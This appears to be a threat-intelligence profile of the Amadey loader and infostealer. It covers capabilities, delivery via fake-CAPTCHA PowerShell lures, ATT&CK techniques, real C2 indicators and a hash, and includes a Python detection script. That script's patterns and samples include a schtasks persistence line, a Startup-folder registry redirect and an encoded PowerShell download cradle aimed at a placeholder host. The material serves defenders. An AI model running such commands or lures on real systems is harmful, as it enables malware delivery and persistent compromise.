Amadey
Amadey is a malware family first identified in 2018 that is widely described as a versatile loader/downloader and infostealer, and is also referred to as a bot associated with a botnet of the same name. Its primary observed functions include collecting system information and reconnaissance data, stealing victim data, and downloading or installing additional payloads. Reported capabilities include collecting the username from an infected host via GetUserNameA, sending victim data to command-and-control servers, using modules or plug-ins for credential theft from popular browsers and VNC systems, screenshot capture, and clipboard hijacking of cryptocurrency wallet addresses. Amadey has also been described as using DLL plug-ins to extend functionality, including screenshot and credential-harvesting modules.
Amadey is frequently used as a delivery mechanism in multi-stage malware operations and in malware-as-a-service (MaaS) and pay-per-install ecosystems. The public reporting aggregated here states that it has delivered, or been associated with, payloads including Lumma Stealer, RedLine, StealC, SmokeLoader, AsyncRAT, XWorm, DOILoader/IDAT Loader/HijackLoader, zgRAT, NetSupport, JaskaGO, Arechclient2, Remcos and, in referenced reporting, LockBit 3.0. Cisco Talos reported in April 2025 on a MaaS operation that used Amadey to deliver payloads via fake GitHub accounts and public repositories, and assessed that the infrastructure was likely providing delivery services for multiple customers. Trend Micro has also described Amadey as a pay-per-install service widely used to deliver infostealer payloads.
Distribution vectors observed in the aggregated reporting include phishing, cracked software and warez, malicious JavaScript and PowerShell chains, fake CAPTCHA or browser-error social engineering, malvertising, compromised websites, LNK-based delivery chains, and other malware downloaders. Specific reporting ties Amadey delivery to ClearFake campaigns, fake CAPTCHA and browser-error lures targeting Windows users, cracked-software infection chains, and GitHub-hosted Emmenhtal/PEAKLIGHT-style loaders. Kaspersky reported widespread phishing campaigns in 2024 that used browser-executed scripts mimicking CAPTCHA prompts and browser errors to trigger downloads of either Lumma Stealer or the Amadey Trojan, with exposure on adult sites, file-sharing services, betting platforms, anime resources, and traffic-monetized web apps.
The malware has been observed establishing persistence. In one analyzed infection chain, an Amadey payload created a scheduled task that runs every minute and modified the User Shell Folders registry entry that controls the Startup folder location. The reporting also notes geofencing behavior: Amadey does not run tasks or install additional malware if the victim machine is located in Russia.
Targeting in the available reporting is broad and opportunistic, but it specifically mentions use against healthcare organizations, industrial control system environments via phishing-driven initial access, and overlap with campaigns targeting Ukrainian entities. Microsoft Threat Intelligence also referenced Amadey in reporting on Secret Blizzard activity against Ukraine. Indicators mentioned directly in the reporting include: 5.42.65.114, noted as previously associated with an Amadey C2 server; 185.215.113.16, from which Talos reported Amadey being downloaded as amnew.exe, after which it contacted hxxp://185.215.113.43/Zu7JuNko/index.php; and another analyzed sample that included the PDB path D:\Mktmp\Amadey\Release\Amadey.pdb and SHA-256 18A38FA6F5B306243D99621556AF948A61DAED29619AB755E25010F9E254C6BD.
Groups observed using it
4 distinct threat actors attributed by public researchers.
2024-12-11, Microsoft Threat Intelligence: Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine (related: Amadey, Kazuar, Wipbot, FlyingYeti)
Fuery is a garble-obfuscated Go 1.20.1 implant dropped by the Amadey botnet (campaign fbf543) ... The same Amadey campaign also deploys a VOLK CryptoMiner.
the group had deployed publicly available malware including gh0st RAT, QUASARRAT, and AMADEY
References: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Techniques & procedures
26 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
A significant increase in the percentage of malicious scripts and phishing pages was driven by a recent series of widespread phishing attacks in August and September. The phishing lures were distributed through various channels, including phishing emails (e.g., fake vulnerability notifications claiming to be from GitHub), malicious links, and malvertising networks.
Execution (7 techniques)
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks ... (T1053.005 – Scheduled Task/Job: Scheduled Task).
Threat actors are increasingly using PowerShell to execute malware, including crypto miners, by embedding malicious code directly into command line arguments.
The instructions provided by the phishing scripts tricked users into executing malicious PowerShell commands to download additional spyware... Nowadays, threat actors are increasingly using PowerShell to execute malware, including crypto miners, by embedding malicious code directly into command line arguments.
Talos discovered another unique file on the “Milidmdds” GitHub account during this research — a malicious Python script named “checkbalance.py”.
Clicking the “I’m not a robot” button copies the line powershell.exe -eC ... to the clipboard and displays so-called “verification steps”: Press Win + R; Press CTRL + V; Press Enter.
Persistence (3 techniques)
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks ... (T1053.005 – Scheduled Task/Job: Scheduled Task).
Privilege Escalation (2 techniques)
Stealth (4 techniques)
The line from the clipboard contains a Base64-encoded PowerShell command... Inside this content is an obfuscated PowerShell script...
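The persistence behaviours summarized earlier (a scheduled task repeating every minute and a change to the Startup entry under User Shell Folders) and the clipboard-pasted "powershell.exe -eC" Base64 one-liner quoted in the Execution and Stealth entries can all be triaged from process command lines. The following Python is an added example, not code from this page or from any vendor: the regexes, the sample command lines, the task name, paths and URL are all constructed for illustration.

```python
import base64
import re
# Assumed detection regexes written for this example (not a vendor's rules).
SCHTASK_MINUTE = re.compile(r"schtasks.*?/SC\s+MINUTE\s+/MO\s+1\b", re.I)
STARTUP_SHELL_FOLDER = re.compile(r"reg(?:\.exe)?\s+add\s+.*User Shell Folders.*?/v\s+Startup\b", re.I)
ENCODED_PS = re.compile(r"powershell(?:\.exe)?\s+.*?-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Keywords that mark a decoded command as a download-and-execute cradle.
CRADLE_WORDS = ("downloadstring", "downloadfile", "invoke-webrequest", "invoke-expression", "iex", "frombase64string")

def encode_powershell(script):
    # -EncodedCommand carries Base64 over the UTF-16LE bytes of the script.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_encoded_command(b64):
    # Returns the script text, or None when the blob is not valid Base64/UTF-16LE.
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(cmdline):
    # Returns the list of findings for one process command line.
    findings = []
    if SCHTASK_MINUTE.search(cmdline):
        findings.append("T1053.005 scheduled task with one-minute repeat")
    if STARTUP_SHELL_FOLDER.search(cmdline):
        findings.append("Startup shell-folder redirection via User Shell Folders")
    m = ENCODED_PS.search(cmdline)
    if m:
        script = decode_encoded_command(m.group(1))
        if script is None:
            findings.append("encoded PowerShell with undecodable payload")
        elif any(w in script.lower() for w in CRADLE_WORDS):
            findings.append("encoded PowerShell download cradle: " + script[:60])
        else:
            findings.append("encoded PowerShell command")
    return findings

def triage_all(cmdlines):
    # Map each suspicious command line to its findings; clean lines are dropped.
    return {c: f for c in cmdlines if (f := triage(c))}

# Constructed sample command lines modelled on the quoted behaviours; task name, paths and URL are placeholders.
SAMPLE_CMDLINES = [
    'schtasks /Create /SC MINUTE /MO 1 /TN "UpdateTaskQC" /TR "C:\\Users\\u\\AppData\\Local\\Temp\\a.exe" /F',
    'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" /v Startup /t REG_EXPAND_SZ /d "C:\\Users\\u\\AppData\\Local\\Temp" /f',
    "powershell.exe -eC " + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/')"),
    "notepad.exe C:\\Users\\u\\notes.txt",
]
```

Calling triage_all(SAMPLE_CMDLINES) flags the first three lines and drops the benign notepad line; feeding it real Sysmon Event ID 1 or 4688 command lines is the intended use.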
Defense Impairment (1 technique)
Credential Access (1 technique)
Discovery (5 techniques)
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
Amadey’s primary functions are to collect system information and download secondary payloads on an infected host.
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Collection (2 techniques)
Command and Control (3 techniques)
After execution, this payload contacts “hxxp://185[.]215[.]113[.]43/Zu7JuNko/index.php”, a known Amadey C2 address.
Exfiltration (1 technique)
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
739 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
104 sources tracked across advisories, community write-ups, and news.
Malware referenced as part of Secret Blizzard operations against Ukraine.
Commodity malware operating as a botnet/loader. In this case it used a C2 panel with a randomized directory path and included a credential-stealing plugin, cred64.dll, targeting browsers, email clients, FTP/SFTP clients, chat software, and Monero wallets.
The content references generated datasets for Windows Amadey file indicators in an attack simulation environment.
A loader used to distribute Socks5Systemz as a standalone final payload.